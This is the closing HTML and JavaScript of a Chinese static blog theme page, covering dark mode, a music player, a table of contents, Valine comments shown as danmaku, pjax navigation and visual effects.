            <i class="fas fa-moon" aria-hidden="true"></i>
          </div>
          `
        );
      } else {
        $(document.body).addClass('darkModel');
        localStorage.setItem('dark', true);
        $(".dark-content").replaceWith(
          `
          <div class='dark-content'>
            <i class="fas fa-lightbulb" aria-hidden="true"></i>
          </div>
          `
        );
      }
    })
  })
</script>
    
    <!-- 渲染回到顶部按钮 -->
    
      <div class="goTop top-btn-color" pointer>
  <i class="fas fa-arrow-up" aria-hidden="true"></i>
</div>
<script src="/js/goTop.js"></script>

    
    <!-- 渲染左下角音乐播放器 -->
    
      <link rel="stylesheet" href="/js/aplayer/APlayer@1.10.1.min.css">
<style>
.aplayer .aplayer-lrc p {
  
  font-size: 12px;
  font-weight: 700;
  line-height: 16px !important;
}

.aplayer .aplayer-lrc p.aplayer-lrc-current {
  
  font-size: 15px;
  color: #C90041;
}


.aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
  left: -66px !important;
}

.aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
  left: 0px !important;
}


</style>
<meting-js  
  class=""
  server="netease"
  type="playlist"
  id="5300120281"
  fixed='true'
  autoplay='true'
  theme='#C90041'
  loop='all'
  order='random'
  preload='auto'
  volume='0.4'
  list-folded='true'
>
</meting-js>

<!-- <style>
  #aplayer {
    position: fixed;
    left: 0;
    bottom: 300px;
  }
</style> -->
<script src="https://unpkg.com/aplayer@1.10.1/dist/APlayer.min.js"></script>
<script src="https://unpkg.com/meting@2/dist/Meting.min.js"></script>
    

    <!-- 图片放大 -->
    
      <script src="/js/fancybox/jquery.fancybox.min.js"></script>
    

    <!-- 百度解析 -->
    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <!-- 背景彩带 -->
    
      <script type="text/javascript" size="100" alpha='0.4' zIndex="-1" src="/js/ribbon.min.js"></script>
    

    <script src="/js/utils/index.js"></script>
    <script src="/js/app.js"></script>
    
    <!-- 文章目录所需js -->
<link href="/js/tocbot/tocbot.css" rel="stylesheet">
<script src="/js/tocbot/tocbot.min.js"></script>

<script>
  var headerEl = 'h1, h2, h3, h4, h5, h6',  //headers 
    content = '.post-detail',//文章容器
    idArr = {};  //标题数组以确定是否增加索引id
  //add #id
  var option = {
    // Where to render the table of contents.
    tocSelector: '.toc',
    // Where to grab the headings to build the table of contents.
    contentSelector: content,
    // Which headings to grab inside of the contentSelector element.
    headingSelector: headerEl,
    scrollSmooth: true,
    scrollSmoothOffset: -80,
    headingsOffset: -($(window).height() * 0.4 - 45),
    positionFixedSelector: '.toc-main',
    positionFixedClass: 'is-position-fixed',
    fixedSidebarOffset: 'auto',
    activeLinkClass: 'is-active-link',
    // onClick: function (e) {},
  }
  if ($('.toc').length > 0) {

    $(content).children(headerEl).each(function () {
      //去除空格以及多余标点
      var headerId = $(this).text().replace(/[\s|\~|`|\!|\@|\#|\$|\%|\^|\&|\*|\(|\)|\_|\+|\=|\||\|\[|\]|\{|\}|\;|\:|\"|\'|\,|\<|\.|\>|\/|\?|\：|\，|\。]/g, '');

      headerId = headerId.toLowerCase();
      if (idArr[headerId]) {
        //id已经存在
        $(this).attr('id', headerId + '-' + idArr[headerId]);
        idArr[headerId]++;
      }
      else {
        //id未存在
        idArr[headerId] = 1;
        $(this).attr('id', headerId);
      }
    });

    document.addEventListener("DOMContentLoaded", function () {
      tocbot.init(option);
      mobileTocClick();
    });

  }

  window.tocScrollFn = function () {
    return bamboo.throttle(function () {
      findHeadPosition();
    }, 100)()
  }
  window.addEventListener('scroll', tocScrollFn);

  const findHeadPosition = function (top) {
    if ($('.toc-list').length <= 0) {
      return false;
    }
    setTimeout(() => {  // or DOMContentLoaded 
      autoScrollToc();
    }, 0);
  }

  const autoScrollToc = function () {
    const $activeItem = document.querySelector('.is-active-link');
    const $cardToc = document.querySelector('.toc-content');
    const activePosition = $activeItem.getBoundingClientRect().top
    const sidebarScrollTop = $cardToc.scrollTop
    if (activePosition > (document.documentElement.clientHeight - 100)) {
      $cardToc.scrollTop = sidebarScrollTop + 150
    }
    if (activePosition < 100) {
      $cardToc.scrollTop = sidebarScrollTop - 150
    }
  }

  document.addEventListener('pjax:send', function () {
    if ($('.toc').length) {
      tocbot.destroy();
    }
  });

  document.addEventListener('pjax:complete', function () {
    if ($('.toc').length) {
      tocbot.init(option);
      mobileTocClick();
    }
  });
  
  // 手机端toc按钮点击出现目录
  const mobileTocClick = function () {
    const $cardTocLayout = document.getElementsByClassName('toc-aside')[0];
    const $cardToc = $cardTocLayout.getElementsByClassName('toc-content')[0];
    let right = '45px';
    if (window.innerWidth >= 551 && window.innerWidth <= 992) {
      right = '100px'
    }
    const mobileToc = {
      open: () => {
        $cardTocLayout.style.cssText = 'animation: toc-open .3s; opacity: 1; right: ' + right
      },

      close: () => {
        $cardTocLayout.style.animation = 'toc-close .2s'
        setTimeout(() => {
          $cardTocLayout.style.cssText = "opacity:''; animation: ''; right: ''"
        }, 100)
      }
    }
    document.getElementById('toc-mobile-btn').addEventListener('click', () => {
      if (window.getComputedStyle($cardTocLayout).getPropertyValue('opacity') === '0') mobileToc.open()
      else mobileToc.close()
    })

    $cardToc.addEventListener('click', (e) => {
      if (window.innerWidth < 992) { // 小于992px的时候
        mobileToc.close()
      }
    })
  }
</script>

<style>
  .is-position-fixed {
    position: sticky !important;
    top: 74px;
  }

  .toc-main ul {
    counter-reset: show-list;
  }

  .toc-main ul li::before {
    content: counter(item)".";
    display: block;
    position: absolute;
    left: 12px;
    top: 0;
  }
</style> 

<!-- 设置导航背景 -->
<script>
  let setHeaderClass = () => {
    const headerMenuTransparent = true;
    if (!headerMenuTransparent) { return; }
    const nav = $('#navHeader');
    const navTop = nav.outerHeight();
    const winTop = $(window).scrollTop();
    if(winTop > navTop) {
      nav.addClass('header-bg-color');
    }
    else {
      nav.removeClass('header-bg-color');
    }
  };

  let scrollCollect = () => {
    return bamboo.throttle(function (e) {
      setHeaderClass();
    }, 200)()
  }

  let initHeaderBg = () => {
    setHeaderClass();
  }

  setHeaderClass();
  window.addEventListener('scroll', scrollCollect);

  document.addEventListener('pjax:send', function () {
    window.removeEventListener('scroll', scrollCollect)
  })
  document.addEventListener('pjax:complete', function () {
    window.addEventListener('scroll', scrollCollect);
    setHeaderClass();
  })
</script> 

<!-- 渲染issues标签里的内容 -->
<script>
  function loadIssuesJS() {
    if ($(".post-detail").find(".issues-api").length == 0) {
      return;
    } 
    loadScript('/js/issues/index.js');
  };
  $(function () {
    loadIssuesJS();
  });
  document.addEventListener('pjax:complete', function () {
    if (typeof IssuesAPI == "undefined") {
      loadIssuesJS();
    }
  })
</script>

<!-- 输入框打字特效 -->
<!-- 输入框打字特效 -->

  <script src="/js/activate-power-mode.js"></script>
  <script>
    POWERMODE.colorful = true;  // 打开随机颜色特效
    POWERMODE.shake = false;    // 关闭输入框抖动
    document.body.addEventListener('input', POWERMODE);//监听打字事件
  </script>


<!-- markdown代码一键复制功能 -->

  <link rel="stylesheet" href="https://unpkg.com/v-plugs-ayu/lib/ayu.css">
  <script src="https://unpkg.com/v-plugs-ayu/lib/ayu.umd.min.js"></script>
  <script src="/js/clipboard/clipboard.min.js"></script>
  <div id="appCopy">
  </div>
  <script data-pjax>
    var vm = new Vue({
      el: '#appCopy',
      data: {
      },
      computed: {
      },
      mounted() {
        const that = this;
        var copy = '复制';
        /* code */
        var initCopyCode = function () {
          var copyHtml = '';
          copyHtml += '<button class="btn-copy" data-clipboard-snippet="" style="position:absolute;top:0;right:0;z-index:1;">';
          copyHtml += '<i class="fas fa-copy"></i><span>' + copy + '</span>';
          copyHtml += '</button>';
          $(".post-detail pre").not('.gutter pre').wrap("<div class='codeBox' style='position:relative;width:100%;'></div>")
          $(".post-detail pre").not('.gutter pre').before(copyHtml);
          new ClipboardJS('.btn-copy', {
            target: function (trigger) {
              return trigger.nextElementSibling;
            }
          });
        }
        initCopyCode();
        $('.btn-copy').unbind('click').bind('click', function () {
          doSomething();
        })
        $(document).unbind('keypress').bind('keypress', function (e) {
          if (e.ctrlKey && e.keyCode == 67) {
            doSomething();
          }
        })

        function doSomething() {
          that.$notify({
            title: "成功",
            content: "代码已复制，请遵守相关授权协议。",
            type: 'success'
          })
        }
      },
      methods: {
      },
      created() { }
    })
  </script>
  

<!-- 图片懒加载 -->
<script defer src="https://unpkg.com/vanilla-lazyload@17.1.0/dist/lazyload.min.js"></script>
<script>
  // https://www.npmjs.com/package/vanilla-lazyload
  // Set the options globally
  // to make LazyLoad self-initialize
  window.lazyLoadOptions = {
    elements_selector: ".lazyload",
    threshold: 0
  };
  // Listen to the initialization event
  // and get the instance of LazyLoad
  window.addEventListener(
    "LazyLoad::Initialized",
    function (event) {
      window.lazyLoadInstance = event.detail.instance;
    },
    false
  );
  document.addEventListener('DOMContentLoaded', function () {
    lazyLoadInstance.update();
  });
  document.addEventListener('pjax:complete', function () {
    lazyLoadInstance.update();
  });
</script>


<!-- 卡片滚动动画 -->

    <script type="text/javascript">
  loadScript("https://unpkg.com/scrollreveal@4.0.6/dist/scrollreveal.min.js")
  function pjax_scrollrebeal() {
    ScrollReveal().reveal('.reveal', {
      distance: '120px',
      duration: '400',
      interval: '30',
      scale: '1',
      origin: 'bottom', // 动画开始的方向
      easing: 'ease'
    });
  }
  $(function () {
    var checkScrollReveal = setInterval(function () {
      if ($("#safearea").css("display") != "block") return
      if (typeof ScrollReveal == "undefined") return
      clearInterval(checkScrollReveal)
      pjax_scrollrebeal();
    }, 100)
  });
  document.addEventListener('pjax:complete', function () {
    pjax_scrollrebeal();
  })
</script>
   

<!-- 评论所需js -->

  
    <!-- 弹幕所需的css和js -->
    
  <!-- 弹幕插件 -->
  <link href="/js/danmu/barrager.css" rel="stylesheet">
  <script src="/js/danmu/jquery.barrager.js"></script>

<!-- 具体js，请前往valine/script.ejs查看 -->

    <script>
  var requiredFields = 'nick';
  requiredFields = requiredFields.split(',');
  comment_el = '.comment';
  let looperValine = null;
  load_valine = function () {
    if ($(comment_el).length) {
      var valine = new Valine({
        el: '#vcomment',
        path: window.location.pathname,
        notify: false,
        verify: false,
        app_id: "HvvYcruryPsiW2egxIpRnlKV-gzGzoHsz",
        app_key: "MLKN1tH2RNDMR4e3O9PJgAh5",
        placeholder: "客官，说点什么吧（如果想让我及时收到的话可以连续发送两遍，会触发邮件提醒机制）",
        avatar: "wavatar",
        master: "3d28ff93d17df2e86f7971eda5159791",   //博主邮箱md5
        tagMeta: ["博主","小伙伴","访客"],     //标识字段名
        friends: "8b42635701290c05327f3faba356ce6e",
        metaPlaceholder: { "nick": "昵称/QQ号", "mail": "邮箱" },
        requiredFields: requiredFields,
        enableQQ: true,
      });
      function debounce(fn) {
        var timerID = null
        return function () {
          var arg = arguments[0]   //获取事件
          if (timerID) {
            clearTimeout(timerID)
          }
          timerID = setTimeout(function () {
            fn(arg)              //事件传入函数
          }, 200)
        }
      }
      //查询评论 valine.Q('*').limit(7) -- 查询所有，限制7条, 下面的的代码是查询当前页面
      var themeDanmu = eval('true');
      var themeLoop = eval('false');
      var themeLooperTime = '5000' || 5000;
      var speed = '20' || 20;
      var isBarrager = true;
      if (themeDanmu == true) {
        do_barrager();
        if ($('.danmuBox').length <= 0) {
          $('.navbar').append('<div class="danmuBox"><div class="danmuBtn open"><span class="danmuCircle"></span><span class="danmuText">弹幕</span></div></div>');
        }
        $('.danmuBtn').on('click', debounce(
          function () {
            if ($('.danmuBtn').hasClass('open')) {
              $('.danmuBtn').removeClass('open')
              clearInterval(looperValine);
              $.fn.barrager.removeAll();
            } else {
              $('.danmuBtn').addClass("open");
              do_barrager();
            }
          }
        ))
      }
      function do_barrager() {
        isBarrager && valine.Q(window.location.pathname).find().then(function (comments) {
          // var num = 0; // 可以记录条数，循环调用的时候只取最新的评论放入弹幕中
          var run_once = true;
          var looper_time = themeLooperTime;
          var total = comments.length;
          // var looper = null;
          var index = 0;
          if (total > 0) {
            barrager();
          } else {
            // 当评论数为0的时候，自动关闭弹幕
            // $('.danmuBtn').removeClass('open');
          }
          function barrager() {
            if (run_once) {
              //如果是首次执行,则设置一个定时器,并且把首次执行置为false
              looperValine = setInterval(barrager, looper_time);
              run_once = false;
            }
            var content = comments[index]._serverData.comment;
            var email = comments[index]._serverData.mail;
            var link = comments[index]._serverData.link;
            var newcontent = content.substring(0, 50).replace(/<[^>]+>/g, "");
            //发布一个弹幕
            const item = {
              img: `https://q1.qlogo.cn/g?b=qq&nk=${email}&s=640`, //图片 
              info: newcontent, //文字 
              href: link, //链接 
              close: true, //显示关闭按钮 
              speed: speed, //延迟,单位秒,默认6 
              color: '#fff', //颜色,默认白色 
              old_ie_color: '#000000', //ie低版兼容色,不能与网页背景相同,默认黑色
            }
            $('body').barrager(item);
            //索引自增
            index++;
            //所有弹幕发布完毕，清除计时器。
            if (index == total) {
              clearInterval(looperValine);
              if (themeLoop === true) {
                setTimeout(function () {
                  do_barrager();
                }, 5000);
              } else {
                $('.danmuBtn').removeClass('open');
              }
              return false;
            }

          }
        })
      }
    }
  };
  $(document).ready(load_valine);
  document.addEventListener('pjax:send', function (e) {
    
      $('.danmuBox').length > 0 && $('.danmuBox').remove()
      looperValine && clearInterval(looperValine);
      $.fn.barrager.removeAll();
    
  })
  document.addEventListener('pjax:complete', function () {
    load_valine();
  });
</script>

  


<!-- 鼠标点击特效 -->
<!-- 爱心点击 -->

  
    <script src="/js/cursor/fireworks.js"></script>
  




  <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" data-pjax></script>


    <!-- pjax -->
    

<!-- pjax -->


  <script src="/js/pjax@0.2.8/index.js"></script>
  
    <!-- 样式位于：source/css/_third-party/pjaxanimate.styl -->

<div class="pjax-animate">
  
    <div class="loading-circle"><div id="loader-circle"></div></div>
    <script>
      window.ShowLoading = function() {
        $(".loading-circle").css("display", "block");
      };
      window.HideLoading = function() {
        $(".loading-circle").css("display", "none");
      }
    </script>
  
	<script>
    document.addEventListener('pjax:complete', function () {
      window.HideLoading();
    })
    document.addEventListener('pjax:send', function () {
      window.ShowLoading();
    })
    document.addEventListener('pjax:error', function () {
      window.HideLoading();
    })
	</script>
</div>

  

  <script>
    var pjax = new Pjax({
      elements: 'a[href]:not([href^="#"]):not([href="javascript:void(0)"]):not([no-pjax])',   // 拦截正常带链接的 a 标签
      selectors: ["#pjax-container","title"],                                   // 根据实际需要确认重载区域
      cacheBust: false,   // url 地址追加时间戳，用以避免浏览器缓存
      timeout: 5000
    });

    document.addEventListener('pjax:send', function (e) {

      try {
        var currentUrl = window.location.pathname;
        var targetUrl = e.triggerElement.href;
        var banUrl = [""];
        if (banUrl[0] != "") {
          banUrl.forEach(item => {
            if(currentUrl.indexOf(item) != -1 || targetUrl.indexOf(item) != -1) {
              window.location.href = targetUrl;
            }
          });
        }
      } catch (error) {}

      $(window).unbind('resize');
      $(window).unbind('scroll');
      $(document).unbind('scroll');
      $(document).unbind('click');
      $('body').unbind('click');

    })
    
    document.addEventListener('pjax:complete', function () {
      $('script[data-pjax], .pjax-reload script').each(function () {
        $(this).parent().append($(this).remove());
      });
    });

    document.addEventListener('pjax:error', function (e) {
      window.location.href = e.triggerElement.href;
    })
    
    // 刷新不从顶部开始
    document.addEventListener("DOMContentLoaded", function () {
      history.scrollRestoration = 'auto';
    })
  </script>



  </body>
</html>